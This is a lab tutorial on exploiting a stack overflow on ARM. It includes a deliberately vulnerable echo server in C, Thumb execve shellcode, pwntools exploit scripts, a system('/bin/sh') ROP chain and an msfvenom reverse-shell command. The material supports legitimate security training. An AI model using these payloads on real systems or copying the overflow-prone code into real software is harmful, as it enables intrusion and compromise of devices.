The Linux exploitation series covers stack overflows, ROP chains, and ASLR bypasses, all on x86/x64. But the majority of embedded devices run ARM processors: Cortex-A in routers and phones, Cortex-M in microcontrollers, older ARM7/ARM9 in legacy industrial equipment. ARM’s instruction set, calling convention, and stack layout differ from x86 in ways that directly affect how you write exploits.
This tutorial bridges the gap. You’ll cross-compile a vulnerable network service for ARM using the Buildroot toolchain, deploy it to the QEMU environment, and exploit a stack buffer overflow, covering the ARM-specific techniques needed at each step.
ARM vs x86: What’s different for exploit development
Before writing any code, understand the key architectural differences.
Calling convention
On 32-bit x86, function arguments are pushed onto the stack. On ARM (AAPCS, ARM Architecture Procedure Call Standard), the first four arguments go in registers:
x86:                    ARM:
push arg3               R0 = arg1
push arg2               R1 = arg2
push arg1               R2 = arg3
call function           R3 = arg4
                        BL function (Branch with Link)
                        SP → arg5, arg6, ... (if needed)
Return address
On x86, CALL pushes the return address onto the stack, and RET pops it. On ARM, BL (Branch with Link) stores the return address in the Link Register (LR / R14), and functions return with BX LR or POP {PC}.
x86 call:                       ARM call:
CALL func                       BL func
→ pushes return addr            → LR = return addr
  to stack                        (NOT on stack)
→ RET pops it                   → BX LR returns
Stack has return addr           Stack does NOT have return addr
→ overflow can overwrite it     → ...unless function saves LR
This is the critical difference for exploitation. If a function never pushes LR to the stack, there’s no return address in its own frame to overwrite (an overflow can still reach a saved LR in a caller’s frame higher up the stack). But any function that calls another function (a non-leaf function) must save LR, and it normally saves it to the stack with PUSH {..., LR} in the prologue.
; Leaf function (no stack return address)
leaf_func:
    ADD R0, R1, R2
    BX LR                   ; return via LR register
; Non-leaf function (LR saved on stack, so it can be overwritten)
nonleaf_func:
    PUSH {R4-R7, LR}        ; save LR and callee-saved regs to stack
    BL some_other_func      ; LR gets overwritten, but old LR is on stack
    ...
    POP {R4-R7, PC}         ; pop saved LR directly into PC → return
The POP {PC} instruction at the end of non-leaf functions is the ARM equivalent of x86’s RET. Overwriting the saved LR value on the stack controls PC on return.
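To make the saved-LR overwrite concrete, here is a minimal Python model of such a frame. It is a sketch under stated assumptions, not a trace of a real binary: the 128-byte buffer, the absence of padding between the buffer and the saved registers, and the return address 0x00010700 are all made up for illustration.

```python
import struct

BUF_SIZE = 128                              # assumed size of the local buffer
POPPED = ["r4", "r5", "r6", "r7", "pc"]     # order used by POP {R4-R7, PC}

def simulate_return(payload: bytes) -> dict:
    """Model the frame [buf | saved r4-r7 | saved LR] and the epilogue pop."""
    # Frame before the overflow: zeroed buffer, dummy saved registers,
    # and a legitimate (made-up) return address in the saved-LR slot.
    frame = bytearray(BUF_SIZE)
    frame += struct.pack("<5I", 4, 5, 6, 7, 0x00010700)
    # Unchecked copy: bytes past BUF_SIZE land on the saved registers.
    n = min(len(payload), len(frame))
    frame[:n] = payload[:n]
    # POP {R4-R7, PC}: load five little-endian words, lowest register first.
    words = struct.unpack_from("<5I", frame, BUF_SIZE)
    return dict(zip(POPPED, words))

benign = simulate_return(b"hello")
hijacked = simulate_return(b"A" * (BUF_SIZE + 16) + struct.pack("<I", 0xDEADBEEC))
print(hex(benign["pc"]), hex(hijacked["pc"]))
```

With the short input the function returns to the original address; with the long input, R4-R7 hold the filler bytes and PC holds the attacker-chosen word.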
Thumb mode
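ARM processors can execute two instruction sets: ARM (fixed 32-bit instructions) and Thumb (16-bit instructions, denser code; Thumb-2 adds 32-bit encodings alongside them). Most modern ARM binaries use Thumb or Thumb-2. The CPU tracks the current mode in the T bit of CPSR. On an interworking branch (BX, BLX, and on ARMv5T and later, POP {..., PC}), the LSB (least significant bit) of the branch target address selects the mode: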
Address 0x00010000 → ARM mode (bit 0 = 0)
Address 0x00010001 → Thumb mode (bit 0 = 1)
When building ROP chains, gadget addresses must have the correct LSB for the instruction mode. Using an ARM-mode address to jump into Thumb code (or vice versa) makes the CPU decode the bytes with the wrong instruction set, which usually ends in an undefined instruction exception or a fault a few instructions later.
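The LSB rule is easy to get wrong when copying addresses out of a disassembler, so a pair of small helpers can make the intent explicit. This is a sketch; the helper names are hypothetical and not part of pwntools or any other library.

```python
def as_thumb(addr: int) -> int:
    """Return addr with bit 0 set, as needed to branch into Thumb code."""
    return addr | 1

def as_arm(addr: int) -> int:
    """Return addr unchanged if it is a valid ARM-mode target (4-byte aligned)."""
    if addr & 3:
        raise ValueError(f"ARM-mode target {addr:#x} is not 4-byte aligned")
    return addr

def split_target(value: int):
    """Interpret a word loaded into PC by an interworking branch.

    Returns (mode, address): bit 0 selects the mode and is not part of
    the address the CPU actually fetches from.
    """
    if value & 1:
        return "thumb", value & ~1
    return "arm", value

print(split_target(as_thumb(0x00010000)))
print(split_target(as_arm(0x00010000)))
```

Wrapping every gadget address in `as_thumb` or `as_arm` when building a chain turns a silent mode mismatch into an explicit choice or an early error.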
No x86-style NOP sled
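On x86, 0x90 is a single-byte NOP used for NOP sleds. ARM instructions are 4 bytes (or 2 bytes in Thumb), so a sled’s length must be a multiple of the instruction size and execution must enter it on an instruction boundary. Any MOV Rx, Rx works as a NOP: 0xE1A00000 (MOV R0, R0) in ARM mode, 0x46C0 (MOV R8, R8) in Thumb. On a little-endian target these are stored as the bytes 00 00 a0 e1 and c0 46. Plan your shellcode padding accordingly.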
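As a quick illustration of the byte-order and alignment points, the sketch below builds ARM and Thumb sleds from the two encodings named above. The function name `nop_sled` is hypothetical, and a little-endian target is assumed.

```python
import struct

ARM_NOP = struct.pack("<I", 0xE1A00000)    # MOV R0, R0 (ARM mode, 4 bytes)
THUMB_NOP = struct.pack("<H", 0x46C0)      # MOV R8, R8 (Thumb, 2 bytes)

def nop_sled(length: int, thumb: bool) -> bytes:
    """Return a sled of exactly `length` bytes for the chosen mode."""
    nop = THUMB_NOP if thumb else ARM_NOP
    if length % len(nop):
        # A partial instruction at the end would be decoded as garbage.
        raise ValueError(f"sled length must be a multiple of {len(nop)}")
    return nop * (length // len(nop))

print(nop_sled(8, thumb=True).hex())
print(nop_sled(8, thumb=False).hex())
```

Unlike an x86 sled, landing in the middle of one of these instructions is not harmless, which is why the length check is there.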
Building the vulnerable target
Create a simple network daemon with a buffer overflow, cross-compile it for ARM, and deploy it to the QEMU Buildroot environment.
The vulnerable service
// vuln_arm.c: a deliberately vulnerable echo server for ARM
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

// Training anchor for the ROP stage. Real targets usually do not hand you this.
// Mark it used so the linker keeps system() and the "/bin/sh" string available.
__attribute__((used))
void keep_system_available(void) {
    system("/bin/sh");
}

void handle_request(int client_fd) {
    char buf[128];
    char response[256];
    // BUG: reads up to 1024 bytes into 128-byte buffer
    int n = recv(client_fd, buf, 1024, 0);
    if (n <= 0) return;
    buf[n < 128 ? n : 127] = '\0'; // won't help: the damage is already done
    snprintf(response, sizeof(response), "Echo: %s\n", buf);
    send(client_fd, response, strlen(response), 0);
}

int main(void) {
    int server_fd = socket(AF_INET, SOCK_STREAM, 0);
    int opt = 1;
    setsockopt(server_fd, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(opt));
    struct sockaddr_in addr = {
        .sin_family = AF_INET,
        .sin_port = htons(8888),
        .sin_addr.s_addr = INADDR_ANY,
    };
    bind(server_fd, (struct sockaddr *)&addr, sizeof(addr));
    listen(server_fd, 5);
    printf("Listening on port 8888\n");
    while (1) {
        int client_fd = accept(server_fd, NULL, NULL);
        handle_request(client_fd);
        close(client_fd);
    }
}
Cross-compiling for ARM
Use the Buildroot cross-compilation toolchain from the previous tutorial. Do not hardcode the toolchain tuple; Buildroot names it based on the target ABI you configured.
export BUILDROOT=~/buildroot
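# Buildroot usually installs *-gcc as a symlink to its toolchain wrapper, so accept symlinks too
export CC="$(find "$BUILDROOT/output/host/bin" -maxdepth 1 \( -type f -o -type l \) -name '*-gcc' | head -1)"
export READELF="$(find "$BUILDROOT/output/host/bin" -maxdepth 1 \( -type f -o -type l \) -name '*-readelf' | head -1)"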
# Compile with debug symbols, no stack protector, no PIE, executable stack
$CC -o vuln_arm vuln_arm.c \
-g -O0 \
-fno-stack-protector \
-no-pie \
-z execstack \
-static
# Verify the binary
file vuln_arm
# vuln_arm: ELF 32-bit LSB executable, ARM, EABI5 version 1, statically linked, ...
$READELF -W -l vuln_arm | grep GNU_STACK
# GNU_STACK ... RWE ... (executable stack for Stage 1)
For subsequent stages, remove the executable-stack request:
$CC -o vuln_arm_nx vuln_arm.c \
-g -O0 \
-fno-stack-protector \
-no-pie \
-static
$READELF -W -l vuln_arm_nx | grep GNU_STACK
# GNU_STACK ... RW ... (the binary requests a non-executable stack)
Warning
NX depends on the emulated CPU and kernel
Removing -z execstack changes the ELF stack permission request. Whether the stack is actually non-executable depends on the kernel and emulated CPU. The older versatilepb/ARM926 target used in the Buildroot lab is an ARMv5 core, which predates the execute-never (XN) page attribute added in ARMv6, so it may not enforce execute-never the way a newer Cortex-A target does. Always verify the runtime mapping in GDB before claiming an NX bypass. If the stack still appears executable, this stage is still useful ARM ROP practice, but it is not demonstrating a real NX bypass on that VM.
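The ELF-side half of that check can also be scripted. The sketch below reads the PT_GNU_STACK flags straight from the program headers using only the standard library. It assumes a 32-bit little-endian ELF such as the binaries built above, the function name `gnu_stack_flags` is hypothetical, and it reports only what the binary requests, not what the kernel and CPU enforce.

```python
import struct

PT_GNU_STACK = 0x6474E551
PF_X, PF_W, PF_R = 1, 2, 4

def gnu_stack_flags(elf: bytes):
    """Return flags such as 'RW' or 'RWE' for PT_GNU_STACK, or None if absent."""
    if elf[:4] != b"\x7fELF" or elf[4] != 1 or elf[5] != 1:
        raise ValueError("expected a 32-bit little-endian ELF image")
    # ELF32 header: e_phoff at offset 28, e_phentsize at 42, e_phnum at 44.
    (e_phoff,) = struct.unpack_from("<I", elf, 28)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 42)
    for i in range(e_phnum):
        # ELF32 program header: eight 32-bit fields, p_type first, p_flags seventh.
        fields = struct.unpack_from("<8I", elf, e_phoff + i * e_phentsize)
        p_type, p_flags = fields[0], fields[6]
        if p_type == PT_GNU_STACK:
            names = ((PF_R, "R"), (PF_W, "W"), (PF_X, "E"))
            return "".join(ch for bit, ch in names if p_flags & bit)
    return None

# Usage against a real file (path is whatever you built):
#   with open("vuln_arm_nx", "rb") as f:
#       print(gnu_stack_flags(f.read()))
```

The letters match what readelf prints in its flags column, so the two outputs can be compared directly.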
Deploying to QEMU
Copy the binary into the Buildroot rootfs and boot:
# Mount the rootfs image
sudo mount -o loop output/images/rootfs.ext4 /mnt
sudo cp vuln_arm /mnt/root/
sudo cp vuln_arm_nx /mnt/root/
sudo umount /mnt
# Boot QEMU with the same configuration from the cross-compiling tutorial,
# adding port 8888 for the vulnerable service
qemu-system-arm \
-M versatilepb \
-m 256M \
-kernel output/images/zImage \
-dtb output/images/versatile-pb.dtb \
-drive file=output/images/rootfs.ext4,if=scsi,format=raw \
-append "root=/dev/sda console=ttyAMA0,115200" \
-nographic \
-net nic,model=rtl8139 \
-net user,hostfwd=tcp::2222-:22,hostfwd=tcp::8888-:8888,hostfwd=tcp::1234-:1234
The hostfwd flags forward host port 2222 to the guest’s SSH port 22, port 8888 to the vulnerable service, and port 1234 to gdbserver.
Inside the QEMU VM:
# Lab-only: keep stack addresses stable while learning.
echo 0 > /proc/sys/kernel/randomize_va_space
/root/vuln_arm &
When switching to gdbserver, stop the background copy first so it does not keep port 8888 bound:
killall vuln_arm 2>/dev/null || true
Finding the overflow offset
The process is the same as x86, adapted for ARM.
Generating a cyclic pattern
# Using pwntools
python3 -c "from pwn import *; print(cyclic(512).decode())" > pattern.txt
Sending the pattern
#!/usr/bin/env python3
from pwn import *
r = remote('127.0.0.1', 8888)
r.send(cyclic(512))
r.close()
Analyzing the crash in GDB
Run the vulnerable binary under gdbserver inside QEMU:
# In QEMU
gdbserver :1234 /root/vuln_arm
On the host, connect with the ARM-aware GDB:
gdb-multiarch -q vuln_arm
(gdb) set architecture arm
(gdb) target remote :1234
(gdb) continue
After sending the pattern, GDB catches the crash:
Program received signal SIGSEGV, Segmentation fault.
0x6261616c in ?? ()
(gdb) info registers
r0 0x0
r1 0x0
...
r4 0x62616168 ← controlled (from POP)
r5 0x62616169 ← controlled
r6 0x6261616a ← controlled
r7 0x6261616b ← controlled
sp 0xbefff100
pc 0x6261616c ← controlled! (saved LR popped into PC)
The PC value tells you the offset:
from pwn import *
print(cyclic_find(0x6261616c)) # 144 in this example
On ARM, the saved LR is often popped into PC via an epilogue such as POP {R4-R7, PC}. In this example crash, the saved LR on the stack was at offset 144 bytes from the start of the cyclic pattern. Treat that number as a measured result, not a rule. Different compiler versions, optimization levels, frame-pointer settings, and local-variable layouts can move buf, response, padding, and saved registers around. One ARM-specific trap: if the popped word has bit 0 set, the CPU (ARMv5T and later) switches to Thumb state and GDB reports PC with that bit cleared, so check the T bit in CPSR and look up pc | 1 when it is set.
If your crash lands on a different cyclic value, use your value. If the compiler places response[256] between buf and the saved registers, the offset will be much larger than 144.
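If pwntools is not available on the machine where you analyze the crash, the same lookup can be reproduced with the standard library. The sketch below generates a de Bruijn sequence over lowercase letters with subsequence length 4, which is the construction pwntools documents for its default cyclic pattern, and searches it for a crashed PC value. The function names are hypothetical and a little-endian target is assumed.

```python
import struct
from itertools import islice

def de_bruijn(alphabet: bytes, n: int):
    """Yield the de Bruijn sequence B(len(alphabet), n), one byte value at a time."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)

def pattern(length: int) -> bytes:
    """First `length` bytes of the pattern; every 4-byte window is unique."""
    return bytes(islice(de_bruijn(b"abcdefghijklmnopqrstuvwxyz", 4), length))

def find_offset(pc_value: int, length: int = 512) -> int:
    """Offset of the little-endian word pc_value in the pattern, or -1."""
    return pattern(length).find(struct.pack("<I", pc_value))

print(pattern(16))
print(find_offset(0x6261616C))
```

Because each 4-byte window occurs only once, a single register value is enough to recover its position in the payload.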
Stack layout at overflow:
Low address
┌──────────────┐ ← buf[0]
│ buf[128] │
│ (128 bytes) │
├──────────────┤
│ saved R4 │ ← offset 128 (4 bytes, controlled)
├──────────────┤
│ saved R5 │ ← offset 132
├──────────────┤
│ saved R6 │ ← offset 136
├──────────────┤
│ saved R7 │ ← offset 140
├──────────────┤
│ saved LR │ ← offset 144 (→ popped into PC)
└──────────────┘
High address
The exact registers saved depend on the function’s prologue. Disassemble handle_request to see what your binary does:
(gdb) disas handle_request
0x00010504 <+0>: push {r4, r5, r6, r7, lr}
0x00010508 <+4>: sub sp, sp, #396
...
0x00010640 <+316>: pop {r4, r5, r6, r7, pc}
The prologue pushes R4-R7 and LR. The epilogue pops them back, with LR going directly into PC. In this sample layout, offset to saved LR = buffer size (128) + alignment padding (0 here) + saved registers (R4-R7 = 16 bytes) = 144. Reconfirm this whenever you rebuild.
Stage 1: Shellcode on executable stack
With -z execstack, the stack is executable. This is the simplest case.
ARM shellcode
ARM Thumb shellcode for execve("/bin/sh", NULL, NULL):
# Pure Thumb-mode execve("/bin/sh") shellcode.
# Uses SVC 0 (supervisor call), the ARM equivalent of x86 INT 0x80
shellcode = (
    b"\x78\x46"          # mov r0, pc    ; r0 = current addr + 4 (pipeline)
    b"\x08\x30"          # adds r0, #8   ; r0 -> "/bin/sh" string
    b"\x49\x40"          # eors r1, r1   ; argv = NULL (Linux accepts this)
    b"\x52\x40"          # eors r2, r2   ; envp = NULL
    b"\x0b\x27"          # movs r7, #11  ; r7 = 11 (SYS_execve)
    b"\x00\xdf"          # svc 0         ; syscall
    b"\x2f\x62\x69\x6e"  # "/bin"
    b"\x2f\x73\x68\x00"  # "/sh\0"
)
Note
ARM pipeline and PC reads
When you read PC in an instruction, the value isn’t the address of that instruction; it’s the address plus a pipeline offset: +8 in ARM mode, +4 in Thumb mode. This is why MOV R0, PC at address X gives R0 = X + 4 in Thumb. The string begins 12 bytes after the first instruction, so adds r0, #8 moves from X + 4 to X + 12.
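Hand-written shellcode bytes are easy to mistype, so it can help to rebuild them from the instruction encodings and compare. The sketch below encodes the six Thumb instructions from their 16-bit formats and checks the PC-relative arithmetic from the note. The encoder function names are hypothetical helpers covering only the forms used here, not a general assembler.

```python
import struct

def mov_hi(rd: int, rm: int) -> int:
    """MOV Rd, Rm (high-register form): 0100 0110 D Rm Rd."""
    return 0x4600 | ((rd >> 3) << 7) | (rm << 3) | (rd & 7)

def adds_imm8(rdn: int, imm: int) -> int:
    """ADDS Rdn, #imm8: 0011 0 Rdn imm8."""
    return 0x3000 | (rdn << 8) | imm

def eors(rdn: int, rm: int) -> int:
    """EORS Rdn, Rm: 0100 0000 01 Rm Rdn."""
    return 0x4040 | (rm << 3) | rdn

def movs_imm8(rd: int, imm: int) -> int:
    """MOVS Rd, #imm8: 0010 0 Rd imm8."""
    return 0x2000 | (rd << 8) | imm

def svc(imm: int) -> int:
    """SVC #imm8: 1101 1111 imm8."""
    return 0xDF00 | imm

halfwords = [
    mov_hi(0, 15),      # mov r0, pc
    adds_imm8(0, 8),    # adds r0, #8
    eors(1, 1),         # eors r1, r1
    eors(2, 2),         # eors r2, r2
    movs_imm8(7, 11),   # movs r7, #11
    svc(0),             # svc 0
]
code = struct.pack("<6H", *halfwords)   # little-endian halfwords
rebuilt = code + b"/bin/sh\x00"

# mov r0, pc sits at offset 0 and reads offset 0 + 4; adding 8 must hit the string.
string_offset = len(code)
pc_read = 0 + 4
print(rebuilt.hex(), pc_read + 8 == string_offset)
```

If an instruction is added or removed, the immediate in `adds r0, #8` has to change with it, which is exactly what the final comparison checks.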
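Alternatively, generate a reverse-shell payload with msfvenom. Check which instruction set the generated code uses: ARM-mode shellcode needs an ARM NOP sled and a 4-byte-aligned return address with bit 0 clear, not the Thumb sled and +1 used for the hand-written shellcode.
msfvenom -p linux/armle/shell_reverse_tcp LHOST=10.0.2.2 LPORT=4444 \
-f python -b "\x00"
Exploit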
#!/usr/bin/env python3
from pwn import *
context.arch = 'arm'
context.endian = 'little'
TARGET = ('127.0.0.1', 8888)
OFFSET_TO_LR = 144 # replace with your cyclic_find result
# Address of buf on the stack — find it in GDB with the -g build:
# (gdb) break handle_request
# (gdb) continue
# (gdb) print &buf
BUF_ADDR = 0xbefff000 # adjust based on your GDB output
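# Build payload (shellcode is the Thumb byte string defined in the previous block)
payload = b"\xc0\x46" * 40 # Thumb NOP sled (NOP/MOV R8, R8)
payload += shellcode
# Keep sled + shellcode below offset 127: handle_request() overwrites buf[127] with '\0'
payload += b"A" * (OFFSET_TO_LR - len(payload)) # pad to saved LR
payload += p32(BUF_ADDR + 1) # +1 for Thumb mode bit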
r = remote(*TARGET)
r.send(payload)
r.close()
Note
The +1 on the return address is critical. ARM uses the LSB to indicate Thumb mode. The payload starts with a Thumb NOP sled and pure Thumb shellcode, so the branch target must have bit 0 set.
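The layout constraints of this payload can be checked before anything is sent. The sketch below rebuilds the same layout with the standard library and rejects combinations that would fail silently. The function name is hypothetical, and the `buf[127]` constraint comes from the terminator that `handle_request` writes after `recv` returns a long input.

```python
import struct

THUMB_NOP = b"\xc0\x46"   # MOV R8, R8, little-endian
CLOBBERED_INDEX = 127     # handle_request() writes '\0' to buf[127] on long input

def build_stage1_payload(shellcode: bytes, buf_addr: int,
                         offset_to_lr: int, sled_len: int = 80) -> bytes:
    """Lay out sled + shellcode + padding + Thumb return address, with checks."""
    if sled_len % 2 or buf_addr % 2:
        raise ValueError("Thumb code must start and stay on 2-byte boundaries")
    body = THUMB_NOP * (sled_len // 2) + shellcode
    if len(body) > min(offset_to_lr, CLOBBERED_INDEX):
        raise ValueError("sled + shellcode would reach buf[127] or the saved registers")
    payload = body.ljust(offset_to_lr, b"A")
    # Bit 0 set: POP {..., PC} enters the sled in Thumb state.
    payload += struct.pack("<I", buf_addr | 1)
    return payload

# Example values only; use your own GDB and cyclic_find results.
demo = build_stage1_payload(b"\x00" * 20, 0xBEFFF000, 144)
print(len(demo), demo[-4:].hex())
```

Failing early with an exception is a deliberate choice here: a payload that is two bytes too long still crashes the target, just not in the way you intended.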
Warning
The execve shellcode above spawns /bin/sh locally on the target, but the shell’s stdin/stdout are not connected to the TCP socket. You can confirm code execution in GDB, but you won’t get an interactive shell over the network. For a practical remote shell, use the msfvenom reverse shell payload shown above, or add dup2 calls to redirect the socket fd to stdin/stdout before the execve.
Stage 2: ROP chain after removing execstack
Recompile without -z execstack. Then verify whether the stack is non-executable at runtime:
# In QEMU
killall vuln_arm vuln_arm_nx 2>/dev/null || true
gdbserver :1234 /root/vuln_arm_nx
# On the host
gdb-multiarch -q vuln_arm_nx
(gdb) set architecture arm
(gdb) target remote :1234
(gdb) continue
# After the process starts
(gdb) info proc mappings
# Look for the stack region:
# rw-p = non-executable stack
# rwxp = executable stack; your VM is not enforcing NX for this mapping
If the stack is rw-p, injected shellcode should fault and ROP is required. If the stack is still rwxp, continue with this section as ROP practice rather than as an NX-bypass claim.
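The same decision can be made from the raw text of /proc/<pid>/maps read inside the guest, which is handy when you want to log the result alongside an exploit run. The sketch below is a minimal parser under that assumption; the function names are hypothetical and the sample text is made up for illustration, not captured from the lab VM.

```python
def stack_permissions(maps_text: str):
    """Return the permission field of the [stack] mapping, or None if not found."""
    for line in maps_text.splitlines():
        fields = line.split()
        # Format: address perms offset dev inode pathname
        if fields and fields[-1] == "[stack]":
            return fields[1]
    return None

def needs_rop(maps_text: str) -> bool:
    """True when the stack mapping lacks the execute permission."""
    perms = stack_permissions(maps_text)
    if perms is None:
        raise ValueError("no [stack] mapping found")
    return "x" not in perms

# Illustrative sample only
SAMPLE_NX = """\
00010000-00090000 r-xp 00000000 08:00 42         /root/vuln_arm_nx
be9df000-bea00000 rw-p 00000000 00:00 0          [stack]
"""
SAMPLE_EXEC = SAMPLE_NX.replace("rw-p", "rwxp")

print(stack_permissions(SAMPLE_NX), needs_rop(SAMPLE_NX))
print(stack_permissions(SAMPLE_EXEC), needs_rop(SAMPLE_EXEC))
```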
ARM ROP gadgets
ARM ROP gadgets look different from x86. The key chain terminator is POP {PC} (equivalent to x86’s RET), and POP {R0-R3, PC} controls both argument registers and the return address.
Common useful ARM gadgets:
pop {r0, pc} ← set first argument + chain
pop {r0, r1, pc} ← set first two arguments + chain
pop {r4, r5, r6, r7, pc} ← very common (function epilogues)
mov r0, r4; pop {r4, pc} ← move saved value to arg register
blx r3 ← call function pointer in r3
Finding gadgets
Use ROPgadget or ropper. ROPgadget detects the architecture from the ELF header and has a --thumb switch for Thumb-mode gadgets; ropper accepts an explicit --arch:
ROPgadget --binary vuln_arm_nx
# Search for Thumb-mode gadgets as well
ROPgadget --binary vuln_arm_nx --thumb
# Or with ropper
ropper --file vuln_arm_nx --arch ARM
For a statically linked binary, you’ll find thousands of gadgets. Key ones to locate:
# Find gadgets that control r0 (first argument)
ROPgadget --binary vuln_arm_nx | grep "pop.*r0.*pc"
# Find gadgets that call through a register
ROPgadget --binary vuln_arm_nx | grep "blx r"
Building the chain: system("/bin/sh")
For this controlled lab, keep_system_available() intentionally references system("/bin/sh") so the static binary contains both the function and the string. Do not assume this in real targets. In real firmware, confirm symbols and strings first, or build an execve syscall chain instead.
Check the binary before writing the chain:
nm -n vuln_arm_nx | grep ' system$'
ROPgadget --binary vuln_arm_nx --string '/bin/sh'
#!/usr/bin/env python3
from pwn import *
context.arch = 'arm'
elf = ELF('./vuln_arm_nx')
TARGET = ('127.0.0.1', 8888)
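# Gadget addresses: placeholders, replace them with values from your own ROPgadget output.
# Thumb gadgets need bit 0 set; ARM-mode gadgets must be 4-byte aligned with bit 0 clear.
POP_R0_PC = 0x00012345 # pop {r0, pc} (odd address, so a Thumb gadget)
POP_R0_R1_PC = 0x00012400 # pop {r0, r1, pc}
POP_R4_R5_R6_R7_PC = 0x00010580 # pop {r4, r5, r6, r7, pc}
MOV_R0_R4_POP_R4_PC = 0x00020100 # mov r0, r4; pop {r4, pc}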
SYSTEM_ADDR = elf.symbols['system']
BIN_SH = next(elf.search(b'/bin/sh\x00'))
print(f"system() @ {hex(SYSTEM_ADDR)}")
print(f"/bin/sh @ {hex(BIN_SH)}")
# ROP chain
# Goal: system("/bin/sh")
# Need: R0 = address of "/bin/sh", then call system()
rop = b""
rop += p32(POP_R0_PC) # gadget: pop {r0, pc}
rop += p32(BIN_SH) # r0 = "/bin/sh"
rop += p32(SYSTEM_ADDR) # pc = system() — this calls system(r0)
# Build full payload
OFFSET_TO_LR = 144 # replace with your cyclic_find result
payload = b"A" * OFFSET_TO_LR
payload += rop # overwrites saved LR -> first gadget
r = remote(*TARGET)
r.send(payload)
r.close()
This chain calls system("/bin/sh"), but the shell’s stdio still belongs to the service process, not the TCP socket. Use GDB to prove that PC reaches system, or extend the chain with dup2(client_fd, 0), dup2(client_fd, 1), and dup2(client_fd, 2) ahead of the jump to system if you want an interactive socket shell. That socket-reuse pattern is covered in the remote exploitation tutorial.
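Before sending a chain, it can help to dump the words that will sit at and above the saved-LR slot and confirm each one is where you expect. The sketch below does that with the standard library. Every address in it is a hypothetical placeholder, and the helper name `annotate` is made up for this example.

```python
import struct

# Hypothetical addresses for illustration only
POP_R0_PC = 0x00012344      # pop {r0, pc}
BIN_SH = 0x00071234         # address of "/bin/sh"
SYSTEM_ADDR = 0x00016D20    # address of system()
OFFSET_TO_LR = 144          # replace with your measured offset

payload = b"A" * OFFSET_TO_LR
payload += struct.pack("<3I", POP_R0_PC, BIN_SH, SYSTEM_ADDR)

def annotate(data: bytes, start: int, labels):
    """Pair each 32-bit little-endian word from `start` onward with a label."""
    words = struct.unpack_from(f"<{len(labels)}I", data, start)
    return [(start + 4 * i, word, label)
            for i, (word, label) in enumerate(zip(words, labels))]

layout = annotate(payload, OFFSET_TO_LR, [
    "saved LR slot -> pop {r0, pc}",
    "popped into r0 (pointer to /bin/sh)",
    "popped into pc (system)",
])
for offset, word, label in layout:
    print(f"+{offset:3d}  {word:#010x}  {label}")
```

Comparing this dump against `x/8wx $sp` at the epilogue breakpoint is a quick way to spot an off-by-four offset.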
ARM-specific ROP challenges
Register setup is indirect. On x86-64, pop rdi; ret directly sets the first argument register. On ARM, function epilogues pop callee-saved registers (R4-R11) and PC, but not argument registers (R0-R3). You often need a two-step chain:
Step 1: pop {r4, pc} → load value into r4
Step 2: mov r0, r4; ... ; pop {pc} → move r4 to r0 (arg register)
BLX vs POP {PC}. BLX (Branch with Link and Exchange) saves the return address in LR, which complicates chaining because the next gadget’s address isn’t on the stack. Prefer gadgets that end with POP {PC} for clean chaining.
Thumb interworking. If some gadgets are in ARM mode and others in Thumb mode, ensure addresses have the correct LSB. Mixed-mode chains are possible but require care.
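The two-step register setup can be dry-run in a toy emulator before touching the target. The sketch below models only what the gadgets in this section do (register moves and pops); it is not a CPU emulator, and all addresses and the `GADGETS` table are hypothetical stand-ins for values taken from your own gadget search.

```python
import struct

# Hypothetical addresses for illustration only
POP_R4_PC = 0x00010580              # pop {r4, pc}
MOV_R0_R4_POP_R4_PC = 0x00020100    # mov r0, r4; pop {r4, pc}
SYSTEM = 0x00016D20
BIN_SH = 0x00071234

GADGETS = {
    POP_R4_PC: [("pop", ["r4", "pc"])],
    MOV_R0_R4_POP_R4_PC: [("mov", "r0", "r4"), ("pop", ["r4", "pc"])],
}

def run_chain(chain: bytes, max_steps: int = 16):
    """Follow the chain until PC leaves the gadget table; return (pc, regs)."""
    words = struct.unpack(f"<{len(chain) // 4}I", chain)
    regs = {"r0": 0, "r4": 0}
    sp = 0
    pc = words[sp]          # the vulnerable epilogue pops the first word into PC
    sp += 1
    for _ in range(max_steps):
        if pc not in GADGETS:
            return pc, regs
        for op in GADGETS[pc]:
            if op[0] == "mov":
                regs[op[1]] = regs[op[2]]
            else:
                for reg in op[1]:
                    value = words[sp]
                    sp += 1
                    if reg == "pc":
                        pc = value
                    else:
                        regs[reg] = value
    raise RuntimeError("chain did not leave the gadget table")

chain = struct.pack("<5I",
                    POP_R4_PC, BIN_SH,                 # step 1: r4 = "/bin/sh"
                    MOV_R0_R4_POP_R4_PC, 0x41414141,   # step 2: r0 = r4, junk for r4
                    SYSTEM)                            # final pc
final_pc, final_regs = run_chain(chain)
print(hex(final_pc), hex(final_regs["r0"]))
```

Note the filler word after the second gadget: its trailing pop consumes one stack slot for r4 before loading PC, and forgetting that slot is a common cause of chains that land four bytes off.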
Debugging ARM exploits with GDB
Useful GDB commands for ARM
# Show all registers including CPSR (flags)
(gdb) info registers
# Show CPSR, including the Thumb-state T bit
(gdb) info registers cpsr
# Override disassembly mode when GDB guesses wrong
(gdb) set arm force-mode thumb
(gdb) disas 0x10504
# Examine stack
(gdb) x/20wx $sp
# Set breakpoint at function epilogue
(gdb) break *0x10640
# Step one instruction
(gdb) stepi
Checking NX from GDB
(gdb) info proc mappings
# Look for the stack region's permissions
# rw-p = non-executable stack
# rwxp = executable stack
Examining the crash
(gdb) info registers pc lr sp
(gdb) x/10i $pc # disassemble at crash point
(gdb) x/20wx $sp # examine stack contents
Practical exercise
- Cross-compile vuln_arm.c for ARM with executable stack, deploy to QEMU, and find the exact overflow offset using cyclic patterns
- Write and test Thumb shellcode that spawns /bin/sh, and verify in GDB that execution reaches the execve syscall
- Recompile without -z execstack, verify the runtime stack mapping, and confirm whether shellcode-on-stack crashes on your VM
- Build an ARM ROP chain to call system("/bin/sh"), verify PC reaches system, then optionally extend the chain with dup2 for a socket-backed shell
- Compare the exploit development experience with the x86 tutorials, and note how the calling convention and POP {PC} pattern change your approach
If you’re coming from the x86 exploitation series, the mental model translates directly. The details change but the principles are identical: control the instruction pointer, set up arguments, redirect to a useful function.